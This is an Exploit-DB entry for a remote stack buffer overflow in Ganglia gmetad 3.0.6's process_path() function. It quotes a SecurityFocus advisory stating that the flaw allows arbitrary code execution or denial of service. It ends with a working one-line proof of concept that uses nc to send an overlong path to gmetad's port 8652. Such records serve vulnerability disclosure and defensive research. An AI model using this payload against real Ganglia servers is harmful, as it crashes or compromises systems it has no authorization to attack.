Ganglia gmetad 3.0.6 - 'process_path()' Remote Stack Buffer Overflow

EDB-ID:

32726




Platform:

Linux

Date:

2009-01-15


source: https://www.securityfocus.com/bid/33299/info

Ganglia is prone to a remote stack-based buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied input.

Attackers can leverage this issue to execute arbitrary code in the context of the application. Successful exploits will compromise the application and the underlying computer. Failed attacks will cause denial-of-service conditions.

echo "/`python -c \"print \\"%s/%s\\" % ('a'*300,'b'*300)\"`" |nc localhost 8652